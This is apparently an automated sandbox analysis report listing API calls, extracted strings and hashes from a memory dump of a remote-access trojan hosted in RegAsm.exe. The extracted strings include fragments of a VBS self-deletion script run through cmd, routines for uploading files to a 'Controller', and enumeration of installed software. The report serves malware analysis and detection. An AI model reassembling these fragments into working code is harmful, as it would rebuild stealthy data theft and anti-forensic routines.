                                  • DeleteDC.GDI32(004595D0), ref: 00411FFD
                                  • DeleteDC.GDI32(00000000), ref: 00412000
                                  • DeleteObject.GDI32(00000000), ref: 00412005
                                  • GlobalFree.KERNEL32(?), ref: 0041200F
                                  • DeleteObject.GDI32(00000000), ref: 004120B4
                                  • GlobalFree.KERNEL32(?), ref: 004120BB
                                  • DeleteDC.GDI32(004595D0), ref: 004120CA
                                  • DeleteDC.GDI32(00000000), ref: 004120D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                  • String ID: DISPLAY
                                  • API String ID: 479521175-865373369
                                  • Opcode ID: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                  • Instruction ID: a12fe5a06dbbbc465c5be36cf98e5f4f0fe68db3817599c41a0b734274edf732
                                  • Opcode Fuzzy Hash: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                  • Instruction Fuzzy Hash: B6C16C75E00219AFDB14DFA4DC45BEEBBB9FF09304F00406AEA05E72A0DB74A945CB59
                                  APIs
                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004137E5
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004137F9
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041381E
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00467C58,00000000), ref: 00413834
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00413875
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041388D
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004138A1
                                  • SetEvent.KERNEL32 ref: 004138C2
                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 004138D3
                                  • CloseHandle.KERNEL32 ref: 004138E3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00413905
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041390F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                  • String ID: alias audio$" type $`!t$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 738084811-4223290481
                                  • Opcode ID: c835b99e485d985039bb9c1c455f644005d40828fc3dd831cac10fa683763642
                                  • Instruction ID: 7cc83dd66f58b781604f24274fbcbce06d703a4d5cc541ca1a03aa14c20c1d7d
                                  • Opcode Fuzzy Hash: c835b99e485d985039bb9c1c455f644005d40828fc3dd831cac10fa683763642
                                  • Instruction Fuzzy Hash: 5451D4B1A00108BFD705BB75DC96DBF3B6C9E41349B10413FF502A61D2EE785E49866E
                                  APIs
                                    • Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                    • Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                    • Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408B30
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408B43
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00408B5F
                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408B8D
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408DB0
                                  • ExitProcess.KERNEL32 ref: 00408DBC
                                    • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValuechar_traits
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1918141659-2254097358
                                  • Opcode ID: 1b31ccbb342cc9f52937740977883d8093ad91a8eaec7a7e4c204ad068d41c4a
                                  • Instruction ID: d6e31582f6bbeec3731eba5083e5c30d2f4351ed3cef2ab9d9d1dbed254d7763
                                  • Opcode Fuzzy Hash: 1b31ccbb342cc9f52937740977883d8093ad91a8eaec7a7e4c204ad068d41c4a
                                  • Instruction Fuzzy Hash: 5A712B31A01208ABDB09EB61E9529EE7769AF50309B64407FB506771D2EF7C2E0EC65C
                                  APIs
                                    • Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                    • Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                    • Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 00408880
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408893
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 004088C5
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.2.0 Light), ref: 004088D3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408ACA
                                  • ExitProcess.KERNEL32 ref: 00408AD1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValue
                                  • String ID: ")$.vbs$5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1304132890-534130063
                                  • Opcode ID: dd13820d7ae900274139401e805ff05c6af80180eda8e33e14dbdb77a9946d9c
                                  • Instruction ID: 4fffedc016be02ce2a268c02f2e0af6a6fdf237cd8678fb7a226089863e9ddbc
                                  • Opcode Fuzzy Hash: dd13820d7ae900274139401e805ff05c6af80180eda8e33e14dbdb77a9946d9c
                                  • Instruction Fuzzy Hash: B9613C31E00208ABCB09FB61E9529EE7769AF51305B64407FB506771D2EE7C2E0AC65C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$EnvironmentVariable$_wcschr
                                  • String ID:
                                  • API String ID: 3899193279-0
                                  • Opcode ID: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                  • Instruction ID: 4237e6e7e157a4c7dbb0d807abf8b9af0d4306fdc3138cecd09bc7ccf606b428
                                  • Opcode Fuzzy Hash: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                  • Instruction Fuzzy Hash: BBD12AB1D047006FEB20AF758851B6F7BA4EF05354F0502AFF9599B3A1EB399880875D
                                  APIs
                                  • lstrlenW.KERNEL32(?,00000000,?), ref: 004144D3
                                  • lstrlenW.KERNEL32(?), ref: 004144FB
                                  • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00414522
                                  • GetLastError.KERNEL32 ref: 00414530
                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 004145A6
                                  • lstrcmpW.KERNEL32(?,?), ref: 004145BF
                                  • FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 004145D8
                                  • FindVolumeClose.KERNEL32(00000018), ref: 00414618
                                  • GetLastError.KERNEL32 ref: 0041462C
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0041465E
                                  • lstrcatW.KERNEL32(?,?), ref: 00414676
                                  • lstrcpyW.KERNEL32(?,?), ref: 00414684
                                  • GetLastError.KERNEL32 ref: 0041468C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                  • String ID: ?
                                  • API String ID: 1756451316-1684325040
                                  • Opcode ID: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                  • Instruction ID: eb6b54062e2b08fb9c29ba80cfda5f6662be00940462f6bf9b60ec097b87ddd8
                                  • Opcode Fuzzy Hash: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                  • Instruction Fuzzy Hash: C051A375E00219ABCF209FA4DD48AEEB778FF99708F1044A6E509D3250E7788AC5CF59
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0044351B
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442730
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442742
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442754
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442766
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442778
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 0044278A
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 0044279C
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 004427AE
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 004427C0
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 004427D2
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 004427E4
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 004427F6
                                    • Part of subcall function 00442713: _free.LIBCMT ref: 00442808
                                  • _free.LIBCMT ref: 00443510
                                    • Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                    • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                  • _free.LIBCMT ref: 00443532
                                  • _free.LIBCMT ref: 00443547
                                  • _free.LIBCMT ref: 00443552
                                  • _free.LIBCMT ref: 00443574
                                  • _free.LIBCMT ref: 00443587
                                  • _free.LIBCMT ref: 00443595
                                  • _free.LIBCMT ref: 004435A0
                                  • _free.LIBCMT ref: 004435D8
                                  • _free.LIBCMT ref: 004435DF
                                  • _free.LIBCMT ref: 004435FC
                                  • _free.LIBCMT ref: 00443614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID: pAF
                                  • API String ID: 161543041-3714919331
                                  • Opcode ID: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                  • Instruction ID: 1e1acce580e4c44e89d7ce72c9cd794b27c1c651c1375113bcda4de26fb62da5
                                  • Opcode Fuzzy Hash: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                  • Instruction Fuzzy Hash: 45316B71A04201AFFB20AE3AD846B97B7E8EF04715F14541FF568D6251DB39AE408B58
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E7CF
                                  • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040E815
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E82F
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040E83A
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E877
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E889
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E894
                                  • GetProcAddress.KERNEL32(00000000,0045EF50), ref: 0040E8A3
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E8BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                  • API String ID: 2490988753-744132762
                                  • Opcode ID: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                  • Instruction ID: e2fe4f89bec593c1194b96244b36457e88d8aa3fc30695666a9ebb8fa0cbd204
                                  • Opcode Fuzzy Hash: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                  • Instruction Fuzzy Hash: 6531D6B3D01218A7DB20AB62DC48A8F77ACAB05704F0049B7EC08B3241D7789E558BEC
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: pAF
                                  • API String ID: 269201875-3714919331
                                  • Opcode ID: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                  • Instruction ID: 220afc4046d47a9c2269d4dee30ff000570bd1da0518462f48b073040ae84213
                                  • Opcode Fuzzy Hash: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                  • Instruction Fuzzy Hash: C7C13575D40604BFEB20DFA9CD42FEE77F8AB08744F54415AFA04FB282D6B4994187A4
                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00415ADF
                                  • GetCursorPos.USER32(?), ref: 00415AEE
                                  • SetForegroundWindow.USER32(?), ref: 00415AF7
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00415B11
                                  • Shell_NotifyIconA.SHELL32(00000002,00467A48), ref: 00415B62
                                  • ExitProcess.KERNEL32 ref: 00415B6A
                                  • CreatePopupMenu.USER32 ref: 00415B70
                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00415B85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                  • Instruction ID: 69ed41baf8013df7edb6dd8303528d2548f60f9075be42ed23a298a7982cfa74
                                  • Opcode Fuzzy Hash: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                  • Instruction Fuzzy Hash: B6213935558208EFDB055FA4ED0EEEA3F25FB45311F000175FA06905B0E7B69960EB5A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
                                  • Instruction ID: 233e507832ae68596296c544fe1e2f99e94559176b76bcc42a010ae489b1e6e1
                                  • Opcode Fuzzy Hash: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
                                  • Instruction Fuzzy Hash: FFB18F71900205AFDB11DF69C881BEEBBF5FF0C308F14506EEA59A7342D77998458BA8
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406180
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004061B6
                                  • __aulldiv.LIBCMT ref: 004061E0
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                    • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004062E6
                                  • ReadFile.KERNEL32(?,00000000,000186A0,?,00000000), ref: 00406301
                                  • CloseHandle.KERNEL32(?), ref: 004063C4
                                  • CloseHandle.KERNEL32(?), ref: 00406400
                                  • CloseHandle.KERNEL32(?), ref: 0040644F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $X|F
                                  • API String ID: 3086580692-2448825271
                                  • Opcode ID: 5f40c9272c2fb33eebd8a6e8cd2b09e0db6637f5d4f811cf83b955913030ff0f
                                  • Instruction ID: ce89fbc2bbcb9f21e0201713ae3f479a73954a728a6b624bb473e1a190b651a0
                                  • Opcode Fuzzy Hash: 5f40c9272c2fb33eebd8a6e8cd2b09e0db6637f5d4f811cf83b955913030ff0f
                                  • Instruction Fuzzy Hash: 72B1CC31E00118ABCB08FBA5D9929EEB7B5AF44314F10812FF906762D1EF785E458B59
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00414A96
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414D4A
                                  • RegCloseKey.ADVAPI32(?), ref: 00414D5E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1332880857-3714951968
                                  • Opcode ID: 5f4892e42dbe902014492c28680763cd6feb2fcb298e99d390137e86d4d3e63b
                                  • Instruction ID: c6cf66618c576b2a9970c100bb5541a486628a9123b9a16081024123d303fd20
                                  • Opcode Fuzzy Hash: 5f4892e42dbe902014492c28680763cd6feb2fcb298e99d390137e86d4d3e63b
                                  • Instruction Fuzzy Hash: B4815F719000189FDB19EB61DC52AEEB778AF54305F1041BFB50AB7192EF386F4ACA58
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: <VF$<VF$@VF$pAF$tAF
                                  • API String ID: 269201875-3149002956
                                  • Opcode ID: f3d3651c9261cb9f84c59ef2b30ac48ba80aedc7a28c02d9b5b11a582e0a71d9
                                  • Instruction ID: c61609b52f92b179b45dad1ed7c922baca2b62edbd6b2c6063e6288bfe8cdad6
                                  • Opcode Fuzzy Hash: f3d3651c9261cb9f84c59ef2b30ac48ba80aedc7a28c02d9b5b11a582e0a71d9
                                  • Instruction Fuzzy Hash: D961C171D00205AFEB20CF69C942B9ABBF5EF49310F64416BF944EB381E7B49D419B98
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00412BE9,00000000), ref: 0041323C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00412BE9,00000000), ref: 00413253
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413260
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412BE9,00000000), ref: 0041326F
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413280
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413283
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID: +A
                                  • API String ID: 221034970-2476349683
                                  • Opcode ID: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
                                  • Instruction ID: 17f09bffcb53596e9d4bf123afaf80ec38c88fef937fd9beb363d4db4ef8fd0f
                                  • Opcode Fuzzy Hash: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
                                  • Instruction Fuzzy Hash: E611E575D411187FD7206F649C89CFF3B6CDB4635AB00016AFA0593140DB784E4BAAF9
                                  APIs
                                    • Part of subcall function 00448DAD: CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 004491F3
                                  • __dosmaperr.LIBCMT ref: 004491FA
                                  • GetFileType.KERNEL32(00000000), ref: 00449206
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00449210
                                  • __dosmaperr.LIBCMT ref: 00449219
                                  • CloseHandle.KERNEL32(00000000), ref: 00449239
                                  • CloseHandle.KERNEL32(00000000), ref: 00449383
                                  • GetLastError.KERNEL32 ref: 004493B5
                                  • __dosmaperr.LIBCMT ref: 004493BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                  • Instruction ID: 16c0764251db30d38a12b5a8a02ae212f1302cce09ed6aaf32cd13814bbbde86
                                  • Opcode Fuzzy Hash: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                  • Instruction Fuzzy Hash: F2A13732A141049FEF19DF68DC527AF7BA0AB4A324F14019EF811EB391DB789C12DB59
                                  APIs
                                    • Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                    • Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                    • Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408E36
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408F95
                                  • ExitProcess.KERNEL32 ref: 00408FA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExecuteExitFileModuleNameOpenProcessQueryShellValue
                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                  • API String ID: 2135335499-2411266221
                                  • Opcode ID: 43d2f52dcf9efa6c94e87b8956494bd2f4746e0ba2e80e1d0218f41f511895a1
                                  • Instruction ID: fa2d1577ff6c4dd0df342fc96389c47364483780c04f7bcf008f7b77c4008c2c
                                  • Opcode Fuzzy Hash: 43d2f52dcf9efa6c94e87b8956494bd2f4746e0ba2e80e1d0218f41f511895a1
                                  • Instruction Fuzzy Hash: 7E413A31910118ABDB09FB61DC52DEE7729AF50305F14017FB506B70D2EE7C6E4ACA58
                                  APIs
                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040915E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 82841172-425784914
                                  • Opcode ID: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
                                  • Instruction ID: 593ac968e999b6fcb1afa8f523a49b2eed45a3e0272f2412b35337e24cb28c51
                                  • Opcode Fuzzy Hash: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
                                  • Instruction Fuzzy Hash: 69411E31901105AADB05FBA2ED578EE77789E60319B20403FB912761D3EF7C2F0D8659
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 0040330D
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004033BD
                                  • TranslateMessage.USER32(?), ref: 004033CC
                                  • DispatchMessageA.USER32(?), ref: 004033D7
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0040348F
                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 004034C7
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
